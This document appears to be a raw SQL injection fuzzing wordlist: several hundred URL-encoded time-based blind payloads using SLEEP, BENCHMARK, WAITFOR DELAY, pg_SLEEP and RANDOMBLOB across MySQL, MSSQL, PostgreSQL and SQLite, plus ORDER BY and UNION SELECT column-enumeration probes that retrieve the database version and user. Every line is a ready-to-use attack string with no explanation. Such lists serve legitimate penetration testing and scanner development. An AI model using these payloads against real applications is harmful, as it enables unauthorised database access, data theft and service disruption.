%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29bAKL%29%20AND%20%27vRxe%27%3D%27vRxe
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29YjoC%29%20AND%20%27%25%27%3D%27
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29--
%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nQIP%29%23
SLEEP%285%29%23
SLEEP%285%29--%20
SLEEP%285%29%3D%22
SLEEP%285%29%3D%27
%20or%20SLEEP%285%29
%20or%20SLEEP%285%29%23
%20or%20SLEEP%285%29--
%20or%20SLEEP%285%29%3D%22
%20or%20SLEEP%285%29%3D%27
waitfor%20delay%20%2700%3A00%3A05%27
waitfor%20delay%20%2700%3A00%3A05%27--%20
waitfor%20delay%20%2700%3A00%3A05%27%23
benchmark%2850000000%2CMD5%281%29%29
benchmark%2850000000%2CMD5%281%29%29--%20
benchmark%2850000000%2CMD5%281%29%29%23
%20or%20benchmark%2850000000%2CMD5%281%29%29
%20or%20benchmark%2850000000%2CMD5%281%29%29--%20
%20or%20benchmark%2850000000%2CMD5%281%29%29%23
pg_SLEEP%285%29
pg_SLEEP%285%29--%20
pg_SLEEP%285%29%23
%20or%20pg_SLEEP%285%29
%20or%20pg_SLEEP%285%29--%20
%20or%20pg_SLEEP%285%29%23
%27%5C%22
%20AnD%20SLEEP%285%29
%20AnD%20SLEEP%285%29--
%20AnD%20SLEEP%285%29%23
%26%26SLEEP%285%29
%26%26SLEEP%285%29--
%26%26SLEEP%285%29%23
%27%20AnD%20SLEEP%285%29%20ANd%20%271
%27%26%26SLEEP%285%29%26%26%271
%20ORDER%20BY%20SLEEP%285%29
%20ORDER%20BY%20SLEEP%285%29--%20
%20ORDER%20BY%20SLEEP%285%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29--
%2Bbenchmark%283200%2CSHA1%281%29%29%2B%27
%20%2B%20SLEEP%2810%29%20%2B%20%27
%20RANDOMBLOB%28500000000%2F2%29
%20AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
%20OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29
%20RANDOMBLOB%281000000000%2F2%29
%20AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29
%20OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000%2F2%29%29%29%29
%20SLEEP%281%29%2F%2A%27%20or%20SLEEP%281%29%20or%20%27%22%20or%20SLEEP%281%29%20or%20%22%2A%2F
%20ORDER%20BY%20SLEEP%285%29
%20ORDER%20BY%201%2CSLEEP%285%29
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30
%20ORDER%20BY%20SLEEP%285%29%23
%20ORDER%20BY%201%2CSLEEP%285%29%23
%20ORDER%20BY%201%2CSLEEP%285%29%2C3%23
%20ORDER%20BY%201%2CSLEEP%285%29%2C3%2C4%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%23
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%23
%20ORDER%20BY%20SLEEP%285%29--%20
%20ORDER%20BY%201%2CSLEEP%285%29--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2C3--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2C3%2C4--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29--%20
%20ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30--%20
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2C3
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2C4
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2C%22%273
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2C%22%273%27%22%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2C4%23
%20UNION%20SELECT%20%40%40VERSION%2CSLEEP%285%29%2CUSER%28%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C5%23
